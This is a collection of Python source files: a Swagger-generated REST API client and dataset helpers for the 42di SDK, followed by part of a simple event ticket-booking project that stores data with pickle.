    target = Project(resource.project_resource_id(), token).dataset(resource.dataset_id)
    if not target.exists() and create:
        target.create()
    if content_type == 'text/csv':
        target.put_csv(data, resource.file_name)
    elif content_type == 'application/parquet':
        target.put_parquet(data, resource.file_name)
    else:
        target.put(data, file_name=resource.file_name, tag=None, content_type=content_type)
    if update_schema:
        target.update_schema(schema(data))
def read(identity, token=None):
    """Read a whole dataset (or one file of it) into a DataFrame."""
    resource = ResourceId(str(identity))
    if resource.resource_type() not in (ResourceType.DATASET, ResourceType.FILE):
        raise ValueError("invalid resource id: %s" % identity)
    project = Project(resource.project_resource_id(), token)
    selected = [resource.file_name] if resource.file_name else []
    return project.dataset(resource.dataset_id).read(file_name=selected)
class DIException(Exception):
    """Error raised for failed 42di API calls (HTTP status, code, message)."""

    def __init__(self, status, code, msg):
        self.status = status
        self.code = code
        self.msg = msg
        detail = "HTTP Status: %s, Code: %s, Message: %s" % (status, code, msg)
        super().__init__(self.status, detail)
def _err_format(e):
    """Translate a swagger ApiException into a DIException and raise it.

    Robust against bodies that are missing, non-JSON, non-object JSON, or
    JSON objects lacking the expected "code"/"message" keys (these used to
    raise TypeError/KeyError and mask the original API error).
    """
    try:
        err = json.loads(e.body)
    except (json.decoder.JSONDecodeError, TypeError) as je:
        # e.body may be None or non-JSON (e.g. a proxy's HTML error page).
        err = {"code": "JSONDecodeError", "message": je}
    if not isinstance(err, dict):
        # Valid JSON but not an object: wrap it so the lookups below work.
        err = {"code": "UnexpectedBody", "message": err}
    raise DIException(e.status, err.get("code", "UnknownError"),
                      err.get("message", "")) from None
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from swagger_client.configuration import Configuration
import swagger_client.models
from swagger_client import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
    def __init__(self, configuration=None, header_name=None, header_value=None,
                 cookie=None):
        """Create the client; a default Configuration is built when none is given."""
        if configuration is None:
            configuration = Configuration()
        self.configuration = configuration
        # Thread pool used to serve asynchronous API calls.
        self.pool = ThreadPool()
        self.rest_client = rest.RESTClientObject(configuration)
        self.default_headers = {}
        if header_name is not None:
            self.default_headers[header_name] = header_value
        self.cookie = cookie
        # Set default User-Agent.
        self.user_agent = 'Swagger-Codegen/1.0.0/python'
    def __del__(self):
        # Shut down the async thread pool when the client is garbage-collected.
        self.pool.close()
        self.pool.join()
    @property
    def user_agent(self):
        """User agent for this API client"""
        return self.default_headers['User-Agent']
    @user_agent.setter
    def user_agent(self, value):
        # Stored directly in the default headers sent with every request.
        self.default_headers['User-Agent'] = value
    def set_default_header(self, header_name, header_value):
        """Set a header that is attached to every request made by this client."""
        self.default_headers[header_name] = header_value
    def __call_api(
            self, resource_path, method, path_params=None,
            query_params=None, header_params=None, body=None, post_params=None,
            files=None, response_type=None, auth_settings=None,
            _return_http_data_only=None, collection_formats=None,
            _preload_content=True, _request_timeout=None):
        """Build and perform one HTTP request, then deserialize the response.

        Synchronous worker behind call_api(); see call_api() for the meaning
        of the parameters.
        """
        config = self.configuration
        # header parameters: merge per-call headers over the client defaults
        header_params = header_params or {}
        header_params.update(self.default_headers)
        if self.cookie:
            header_params['Cookie'] = self.cookie
        if header_params:
            header_params = self.sanitize_for_serialization(header_params)
            header_params = dict(self.parameters_to_tuples(header_params,
                                                           collection_formats))
        # path parameters: substitute {name} placeholders in the resource path
        if path_params:
            path_params = self.sanitize_for_serialization(path_params)
            path_params = self.parameters_to_tuples(path_params,
                                                    collection_formats)
            for k, v in path_params:
                # specified safe chars, encode everything
                resource_path = resource_path.replace(
                    '{%s}' % k,
                    quote(str(v), safe=config.safe_chars_for_path_param)
                )
        # query parameters
        if query_params:
            query_params = self.sanitize_for_serialization(query_params)
            query_params = self.parameters_to_tuples(query_params,
                                                     collection_formats)
        # post parameters (form fields and file uploads)
        if post_params or files:
            post_params = self.prepare_post_parameters(post_params, files)
            post_params = self.sanitize_for_serialization(post_params)
            post_params = self.parameters_to_tuples(post_params,
                                                    collection_formats)
        # auth setting
        self.update_params_for_auth(header_params, query_params, auth_settings)
        # body
        if body:
            body = self.sanitize_for_serialization(body)
        # request url
        url = self.configuration.host + resource_path
        # perform request and return response
        response_data = self.request(
            method, url, query_params=query_params, headers=header_params,
            post_params=post_params, body=body,
            _preload_content=_preload_content,
            _request_timeout=_request_timeout)
        self.last_response = response_data
        return_data = response_data
        if _preload_content:
            # deserialize response data into the declared response_type
            if response_type:
                return_data = self.deserialize(response_data, response_type)
            else:
                return_data = None
        if _return_http_data_only:
            return (return_data)
        else:
            return (return_data, response_data.status,
                    response_data.getheaders())
    def sanitize_for_serialization(self, obj):
        """Builds a JSON POST object.

        If obj is None, return None.
        If obj is str, int, long, float, bool, return directly.
        If obj is datetime.datetime, datetime.date
            convert to string in iso8601 format.
        If obj is list, sanitize each element in the list.
        If obj is dict, return the dict.
        If obj is swagger model, return the properties dict.

        :param obj: The data to serialize.
        :return: The serialized form of data.
        """
        if obj is None:
            return None
        elif isinstance(obj, self.PRIMITIVE_TYPES):
            return obj
        elif isinstance(obj, list):
            return [self.sanitize_for_serialization(sub_obj)
                    for sub_obj in obj]
        elif isinstance(obj, tuple):
            return tuple(self.sanitize_for_serialization(sub_obj)
                         for sub_obj in obj)
        elif isinstance(obj, (datetime.datetime, datetime.date)):
            return obj.isoformat()
        if isinstance(obj, dict):
            obj_dict = obj
        else:
            # Convert model obj to dict except
            # attributes `swagger_types`, `attribute_map`
            # and attributes which value is not None.
            # Convert attribute name to json key in
            # model definition for request.
            obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
                        for attr, _ in six.iteritems(obj.swagger_types)
                        if getattr(obj, attr) is not None}
        # Recurse into the dict's values so nested models are converted too.
        return {key: self.sanitize_for_serialization(val)
                for key, val in six.iteritems(obj_dict)}
    def deserialize(self, response, response_type):
        """Deserializes response into an object.

        :param response: RESTResponse object to be deserialized.
        :param response_type: class literal for
            deserialized object, or string of class name.

        :return: deserialized object.
        """
        # handle file downloading
        # save response body into a tmp file and return the instance
        if response_type == "file":
            return self.__deserialize_file(response)
        # fetch data from response object
        try:
            data = json.loads(response.data)
        except ValueError:
            # Non-JSON body: fall back to the raw payload.
            data = response.data
        return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(swagger_client.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
response_data = response.data
with open(path, "wb") as f:
if isinstance(response_data, str):
# change str to bytes so we can write it
response_data = response_data.encode('utf-8')
f.write(response_data)
else:
f.write(response_data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if not klass.swagger_types and not self.__hasattr(klass, 'get_real_child_model'):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance | 42di | /42di-0.2.6.tar.gz/42di-0.2.6/swagger_client/api_client.py | api_client.py |
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = '{}'
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str) or isinstance(body, bytes):
if isinstance(body, str) :
request_body = body.encode("utf-8")
else:
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message | 42di | /42di-0.2.6.tar.gz/42di-0.2.6/swagger_client/rest.py | rest.py |
from __future__ import absolute_import
import copy
import logging
import multiprocessing
import sys
import urllib3
import six
from six.moves import http_client as httplib
class TypeWithDefault(type):
def __init__(cls, name, bases, dct):
super(TypeWithDefault, cls).__init__(name, bases, dct)
cls._default = None
def __call__(cls):
if cls._default is None:
cls._default = type.__call__(cls)
return copy.copy(cls._default)
def set_default(cls, default):
cls._default = copy.copy(default)
class Configuration(six.with_metaclass(TypeWithDefault, object)):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
"""
def __init__(self):
"""Constructor"""
# Default Base url
self.host = "/api/v1"
# Temp file folder for downloading files
self.temp_folder_path = None
# Authentication Settings
# dict to store API key(s)
self.api_key = {}
# dict to store API prefix (e.g. Bearer)
self.api_key_prefix = {}
# function to refresh API key if expired
self.refresh_api_key_hook = None
# Username for HTTP basic authentication
self.username = ""
# Password for HTTP basic authentication
self.password = ""
# Logging Settings
self.logger = {}
self.logger["package_logger"] = logging.getLogger("swagger_client")
self.logger["urllib3_logger"] = logging.getLogger("urllib3")
# Log format
self.logger_format = '%(asctime)s %(levelname)s %(message)s'
# Log stream handler
self.logger_stream_handler = None
# Log file handler
self.logger_file_handler = None
# Debug file location
self.logger_file = None
# Debug switch
self.debug = False
# SSL/TLS verification
# Set this to false to skip verifying SSL certificate when calling API
# from https server.
self.verify_ssl = True
# Set this to customize the certificate file to verify the peer.
self.ssl_ca_cert = None
# client certificate file
self.cert_file = None
# client key file
self.key_file = None
# Set this to True/False to enable/disable SSL hostname verification.
self.assert_hostname = None
# urllib3 connection pool's maximum number of connections saved
# per pool. urllib3 uses 1 connection as default value, but this is
# not the best value when you are making a lot of possibly parallel
# requests to the same host, which is often the case here.
# cpu_count * 5 is used as default value to increase performance.
self.connection_pool_maxsize = multiprocessing.cpu_count() * 5
# Proxy URL
self.proxy = None
# Safe chars for path_param
self.safe_chars_for_path_param = ''
@property
def logger_file(self):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
return self.__logger_file
@logger_file.setter
def logger_file(self, value):
"""The logger file.
If the logger_file is None, then add stream handler and remove file
handler. Otherwise, add file handler and remove stream handler.
:param value: The logger_file path.
:type: str
"""
self.__logger_file = value
if self.__logger_file:
# If set logging file,
# then add file handler and remove stream handler.
self.logger_file_handler = logging.FileHandler(self.__logger_file)
self.logger_file_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_file_handler)
if self.logger_stream_handler:
logger.removeHandler(self.logger_stream_handler)
else:
# If not set logging file,
# then add stream handler and remove file handler.
self.logger_stream_handler = logging.StreamHandler()
self.logger_stream_handler.setFormatter(self.logger_formatter)
for _, logger in six.iteritems(self.logger):
logger.addHandler(self.logger_stream_handler)
if self.logger_file_handler:
logger.removeHandler(self.logger_file_handler)
@property
def debug(self):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
return self.__debug
@debug.setter
def debug(self, value):
"""Debug status
:param value: The debug status, True or False.
:type: bool
"""
self.__debug = value
if self.__debug:
# if debug status is True, turn on debug logging
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.DEBUG)
# turn on httplib debug
httplib.HTTPConnection.debuglevel = 1
else:
# if debug status is False, turn off debug logging,
# setting log level to default `logging.WARNING`
for _, logger in six.iteritems(self.logger):
logger.setLevel(logging.WARNING)
# turn off httplib debug
httplib.HTTPConnection.debuglevel = 0
@property
def logger_format(self):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
return self.__logger_format
@logger_format.setter
def logger_format(self, value):
"""The logger format.
The logger_formatter will be updated when sets logger_format.
:param value: The format string.
:type: str
"""
self.__logger_format = value
self.logger_formatter = logging.Formatter(self.__logger_format)
def get_api_key_with_prefix(self, identifier):
"""Gets API key (with prefix if set).
:param identifier: The identifier of apiKey.
:return: The token for api key authentication.
"""
if self.refresh_api_key_hook:
self.refresh_api_key_hook(self)
key = self.api_key.get(identifier)
if key:
prefix = self.api_key_prefix.get(identifier)
if prefix:
return "%s %s" % (prefix, key)
else:
return key
def get_basic_auth_token(self):
"""Gets HTTP basic authentication header (string).
:return: The token for basic HTTP authentication.
"""
return urllib3.util.make_headers(
basic_auth=self.username + ':' + self.password
).get('authorization')
def auth_settings(self):
"""Gets Auth Settings dict for api client.
:return: The Auth Settings information dict.
"""
return {
'APIKeyAuth':
{
'type': 'api_key',
'in': 'header',
'key': 'X-API-Key',
'value': self.get_api_key_with_prefix('X-API-Key')
},
'AccessToken':
{
'type': 'api_key',
'in': 'query',
'key': 'token',
'value': self.get_api_key_with_prefix('token')
},
}
def to_debug_report(self):
"""Gets the essential information for debugging.
:return: The report for debugging.
"""
return "Python SDK Debug Report:\n"\
"OS: {env}\n"\
"Python Version: {pyversion}\n"\
"Version of the API: 1.0\n"\
"SDK Package Version: 1.0.0".\
format(env=sys.platform, pyversion=sys.version) | 42di | /42di-0.2.6.tar.gz/42di-0.2.6/swagger_client/configuration.py | configuration.py |
import os
import pathlib
import pickle
class Ticket:
name = ''
email = ''
event = ''
reference = 200000
def bookTicket(self):
self.name= input("Enter Customer Name: ")
self.email = input("Enter Customer Email: ")
file = pathlib.Path("events2.data")
if file.exists():
infile = open('events2.data', 'rb')
eventdetails = pickle.load(infile)
self.reference = input("Enter Reference Code(10000 - 50000) : ")
while True:
if int(self.reference) <= 10000:
print("Warning: Please Enter Valid Reference Code")
self.reference = input("Enter Reference Code(10000 - 50000) : ")
else:
break
for event in eventdetails:
print("Available Event Code : " + event.eventcode + " Event Name : " + event.eventname)
infile.close()
self.event = input("Enter Event Code: ")
def check(self):
file = pathlib.Path("tickets.data")
if file.exists():
if os.path.getsize(file) :
infile = open('tickets.data', 'rb')
ticketdetails = pickle.load(infile)
for ticket in ticketdetails:
if ticket.email == self.email and ticket.event == self.event:
return True
infile.close()
def gettotalticketcount(self):
file = pathlib.Path("events2.data")
if file.exists():
infile = open('events2.data', 'rb')
eventdetails = pickle.load(infile)
for event in eventdetails:
if event.eventcode == self.event:
return int(event.eventTotalAvaibleSeat)
infile.close
else:
return 0
def getBookedSeatCount(self):
file = pathlib.Path("tickets.data")
counter= 0
if file.exists():
if os.path.getsize(file) > 0 :
infile = open('tickets.data', 'rb')
ticketdetails = pickle.load(infile)
for ticket in ticketdetails:
if ticket.event == self.event:
counter = counter + 1
return int(counter)
infile.close()
return 0 | 437-project | /437-project-1.3.tar.gz/437-project-1.3/src/Ticket.py | Ticket.py |
# Book Ticket and Check Condition
import os
import pathlib
import pickle
from src.Events import Events
from src.NetworkingEvent import NetworkingEvent
from src.PartyEvent import PartyEvent
from src.WorkshopEvent import WorkshopEvent
from src.CharityEvent import CharityEvent
from src.Ticket import Ticket
from prettytable import PrettyTable
def bookEventTicket():
ticket = Ticket()
ticket.bookTicket()
if ticket.check():
print("Warning : You Already Booked A Seat")
input('Press Enter To Return')
